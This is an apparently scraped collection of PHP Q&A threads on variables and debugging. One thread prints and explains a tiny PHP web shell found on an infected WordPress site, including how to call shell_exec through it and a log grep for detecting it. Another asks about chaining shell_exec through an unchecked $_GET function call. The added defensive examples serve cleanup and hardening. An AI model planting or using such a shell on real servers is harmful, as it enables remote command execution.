I have the following variables in my php test script :
$url="http://example.com";
$uri="/index.php";
$url="$url$uri";
echo $url;
This returns the values of 2 variables $url and $uri, and the result I get is :
http://example.com/index.php
My question is : if php processes variables from top to bottom then, why does "echo $url" not display the value of first variable "http://example.com" ?
And in this situation how will I be able to echo the value of first variable? Do I need to move the first variable from top to middle? :
$uri="/index.php";
$url="$url$uri";
$url="http://example.com";
echo $url;
Any ideas?
Is order of variables important in php?
Order of statements is. PHP does things in the order you tell it to do them.
if php processes variables from top to bottom then ,why does "echo $url" not display the value of first variable
It does. It's just that that variable no longer has the value you gave it on line 1 because you gave it a new value on line 3.
And in this situation how will I be able to echo the value of first variable?
There are lots of approaches to that and …
Do I need to move the first variable from top to middle?
… would do it, but makes the line $url="$url$uri"; entirely pointless.
You need to step back and think about what you actually want to achieve.
If you need to keep the URL to the site root around and have the combined URL available somewhere, then maybe introducing a third variable name is the way forward.
If you are just debugging and want to make sure the value of $url is right before you change it, then you should probably move your echo statement instead.
The following is working in index.php, but is it correct?
Before the html tag:
$la= array();
$la['index.php'] = 'Start page';
(Actually this is another language library that is included)
Then inside the header:
<title><?php echo $la[$_SERVER['PHP_SELF']];?></title>
For me the part "$la[$_SERVER['PHP_SELF']]" seems strange, but it's working. The title is there in my browser. Is it good practice?
Yes, current code works. If it's good practice is up for debate.
PHP (like many other languages) will evaluate the statements in order.
Every time you use the brackets you are really using the array's index operator where the index acts as the parameter.
Your code will first evaluate the $_SERVER['PHP_SELF'] statement which probably returns 'index.php'. The next call will be $la['index.php'] (since that was what your inner statement returned). This will in turn return the value 'Start page' which is what is sent to the echo.
There's nothing wrong with your code. The superglobal $_SERVER['PHP_SELF'] holds the name of the current file. It's not very secure because it can be manipulated to execute arbitrary code if you inject it without sanitizing it properly.
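The same title lookup, written out as an added example (not code from the thread) with the key normalised, the missing-key case handled, and the output escaped. The $la entries and the request paths are constructed for illustration; the one assumption is that the titles table only needs the script's file name as its key.

```php
<?php
// Added example: a lookup-table page title that tolerates unexpected
// PHP_SELF values and escapes whatever ends up inside <title>.

declare(strict_types=1);

// Constructed titles table, same shape as the one in the question.
$la = [];
$la['index.php'] = 'Start page';
$la['about.php'] = 'About us';

// Resolve the page title from the script path. basename() strips the
// directory part, so "/index.php" matches the "index.php" key. A value
// with extra path segments, or a script not in the table, falls back to a
// fixed default instead of raising an "undefined index" notice.
function page_title(array $titles, string $phpSelf, string $default = 'Untitled'): string
{
    $key = basename($phpSelf);
    return $titles[$key] ?? $default;
}

// Escape at output time regardless of where the title came from, so a
// title built from request data can never break out of the <title> element.
function title_tag(string $title): string
{
    return '<title>' . htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</title>';
}

echo title_tag(page_title($la, '/index.php')), "\n";            // <title>Start page</title>
echo title_tag(page_title($la, '/index.php/<script>')), "\n";   // <title>Untitled</title>
echo title_tag(page_title($la, '/missing.php')), "\n";          // <title>Untitled</title>
```

The table itself is what keeps this safe: the request only selects among titles the server defines, and the fallback plus htmlspecialchars() close the two ways a crafted PHP_SELF could still surface in the page.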
I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
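The answer above suggests grepping the access log for requests that match the shell's calling convention. As an added example (not from the thread), here is a small PHP scanner that generalises that grep: it flags any request whose query string carries a value that is the name of a real PHP function, which is the signature of the "variable function" pattern in $_=$_GET[page]. The log lines are constructed; the Common Log Format layout and the use of function_exists() on the scanning host's own PHP are assumptions.

```php
<?php
// Added example: detect requests that pass PHP function names as query
// parameter values, the calling style of the tiny shell discussed above.

declare(strict_types=1);

// Extract the request target (path plus query) from a Common Log Format
// line. Returns null when the line does not look like an access-log entry.
function request_target(string $logLine): ?string
{
    if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $logLine, $m) !== 1) {
        return null;
    }
    return $m[1];
}

// Return the query parameters (name => value) whose value names a function
// that exists in this PHP runtime. An empty array means nothing unusual.
function function_named_params(string $target): array
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return [];
    }
    parse_str($query, $params);
    $hits = [];
    foreach ($params as $name => $value) {
        // Only a plain identifier can be a function name; arrays are skipped.
        if (is_string($value) && preg_match('/^[A-Za-z_]\w*$/', $value) === 1 && function_exists($value)) {
            $hits[(string) $name] = $value;
        }
    }
    return $hits;
}

// Constructed sample log: one benign request, two in the shell's style.
$sampleLog = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:57:01 +0000] "POST /file.php?page=shell_exec HTTP/1.1" 200 77',
    '203.0.113.9 - - [10/Oct/2023:13:57:02 +0000] "GET /file.php?2=shell_exec&1=whoami HTTP/1.1" 200 77',
];

foreach ($sampleLog as $line) {
    $target = request_target($line);
    if ($target === null) {
        continue;
    }
    foreach (function_named_params($target) as $name => $fn) {
        printf("suspicious: %s  (param %s names function %s)\n", $target, $name, $fn);
    }
}
```

As the answer notes, only the GET half of a request is in the log; a shell that takes the function name via POST leaves no parameter to match, so this finds the GET-driven calls and nothing more.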
I have the following code:
<?php
if(isset($_GET['function'])){
$_GET['function']();
}
?>
So if I entered this url:
http://localhost/?function=phpinfo
I will see the phpinfo function output on the screen.
Can I have a way to concatenate 2 functions in the url like this example:
http://localhost/?function=shell_exec('ls') AND phpinfo
So I want to see the first function output..
If you may be asking why I need this, it is because I am pen testing a web application with this situation..
Thanks for the help..
With your given code example it is not possible to do what you want. All your functions, so shell_exec('ls') and phpinfo, will be interpreted as one string, which is then called as a function by calling it with added parentheses.
The only way that I can think of is using a variable parameter list, rather than just a single parameter. Get all the GET parameters in the function, and loop through them, executing each one.
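The code in the question calls whatever function name the client supplies. As an added example (not from the thread), the snippet below puts that pattern beside the form a defender would ship: the request selects a key, and the server owns the table of callables. The action names "version" and "time" and their targets are constructed for illustration.

```php
<?php
// Added example: unchecked dynamic call from request input beside an
// allowlisted dispatcher.

declare(strict_types=1);

// The pattern from the question: any function the client names is called.
// Kept only for contrast with the hardened version below; never invoked.
function dispatch_unchecked(array $get): void
{
    if (isset($get['function'])) {
        $get['function']();
    }
}

// Hardened: the client picks a key, the server decides what it maps to.
// Constructed table; a real app would list its own handlers here.
const ALLOWED_ACTIONS = [
    'version' => 'phpversion',
    'time'    => 'time',
];

// Returns the handler's result as a string, or null for an unknown action.
function dispatch_allowlisted(array $get): ?string
{
    $action = $get['function'] ?? null;
    if (!is_string($action) || !array_key_exists($action, ALLOWED_ACTIONS)) {
        return null;   // unknown action: refuse (and log / send 400 in a real app)
    }
    $handler = ALLOWED_ACTIONS[$action];
    return (string) $handler();
}

// Constructed requests: one permitted, one the unchecked version would run.
var_dump(dispatch_allowlisted(['function' => 'version']));   // string, e.g. "8.2.0"
var_dump(dispatch_allowlisted(['function' => 'phpinfo']));   // NULL: not in the table
```

The check is array_key_exists() against a constant table, not a blocklist of "bad" names: the set of functions that can do damage is open-ended, while the set of actions the page actually needs is small and known.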
So I have the code below; basically when it's run it will display a graph. How can I make the variables inside the arrays work? The variable works and when echoed will give a number, but for some reason it doesn't input the number there. $mar1 in [here]
$lineChart = new gLineChart($_GET['width'],$_GET['height']);
[here]$lineChart->addDataSet(array($mar1,315,66,40));[/here]
$lineChart->setLegend(array("first"));
$lineChart->setColors(array("ff3344", "11ff11", "22aacc", "3333aa"));
$lineChart->setVisibleAxes(array('x','y'));
$lineChart->setDataRange(30,400);
$lineChart->addAxisLabel(0, array("This", "axis", "has", "labels!"));
$lineChart->addAxisRange(1, 30, 400);
$lineChart->setGridLines(0, 15);
$lineChart->renderImage();
This is a very, very basic question about PHP syntax. Arrays can and frequently are used with variable data.
There isn't anything wrong with the syntax of the code that you posted, so chances are that this is a case of the $mar1 variable not being defined or not containing the data that you're expecting. You probably want to echo or var_dump this variable and see what's in it and work backwards from there.
If $mar1 doesn't contain what you expect, look in the code above that line and see if its value is being set. If this is being passed in the browser's query string like the $_GET['width'] and $_GET['height'] variables are, you would need to access it as $_GET['mar1'] instead of just $mar1.
If this file is being included from another file or includes/requires other files, it could also be defined in the including file(s).
If $mar1 does contain the value you're expecting, then check the documentation for the gLineChart class and make sure that you're passing it all the correct parameters.
I have an old application which pops up an error at a certain location. The error is about a wrongly set variable. Only from the error it is not possible to find the location where the variable is set wrong. Now my idea is to use reflections to find the location.
Is it possible to use reflections to find the code position at which a variable gets a certain value?
The idea: I have the name and the value of the variable. Now if both are matching a certain event should be triggered and echo the actual parsed file and line number.
Any ideas that help are appreciated.
Thank you,
-lony
P.S.: Is it possible even if the application is not really object oriented and uses a lot of spaghetti code?
I would suggest you do a debug_backtrace at the point where the error occurs and try to exploit the stack trace to see where the variable is changed. The debug_backtrace would give you a list of files included; after that it should be fairly easy to filter a list of lines with a global search (i.e. grep)
var_dump(debug_backtrace());
if ($variable == $value) {
    echo "variable equals value, line #whatever" . "<br/>";
}
Just place these at various points in code and see which ones display. Manually enter line numbers.
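The manual line numbers in the answer above can be taken from the call stack instead. As an added example (not from the thread), here is a small watch helper built on debug_backtrace(): drop a call to it next to each assignment you suspect, and it reports the file and line of that call site when the value matches. The watched variable $mode and its values are constructed.

```php
<?php
// Added example: report where a watched variable takes a suspect value,
// using the caller's frame from debug_backtrace() for the file and line.

declare(strict_types=1);

// Returns "file:line (name === value)" for the place that called
// watch_value(), or null when the value does not match.
function watch_value(string $name, $value, $suspect): ?string
{
    if ($value !== $suspect) {
        return null;
    }
    // Frame 0 is the call to watch_value() itself; its 'file' and 'line'
    // are the caller's, which is exactly the location worth reporting.
    $frames = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS, 1);
    $frame  = $frames[0];
    return sprintf('%s:%d (%s === %s)', $frame['file'], $frame['line'], $name, var_export($suspect, true));
}

// Constructed "spaghetti": $mode is assigned in several places and we want
// to know which assignment produces the bad value 'broken'.
$mode = 'init';
$hit  = watch_value('mode', $mode, 'broken');   // no match, returns null
$mode = 'broken';                                // the assignment being hunted
$hit  = watch_value('mode', $mode, 'broken');   // matches: this line is reported
echo $hit === null ? "no match\n" : "matched at $hit\n";
```

Because the helper returns rather than echoes, the same call can be routed to error_log() on a live site, and DEBUG_BACKTRACE_IGNORE_ARGS keeps argument values (which may include secrets) out of the captured frame.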
I found a solution to one of my problems.
The function debug_print_backtrace helped me finally debugging my spaghetti code. I found it by reading this post.
-Cheers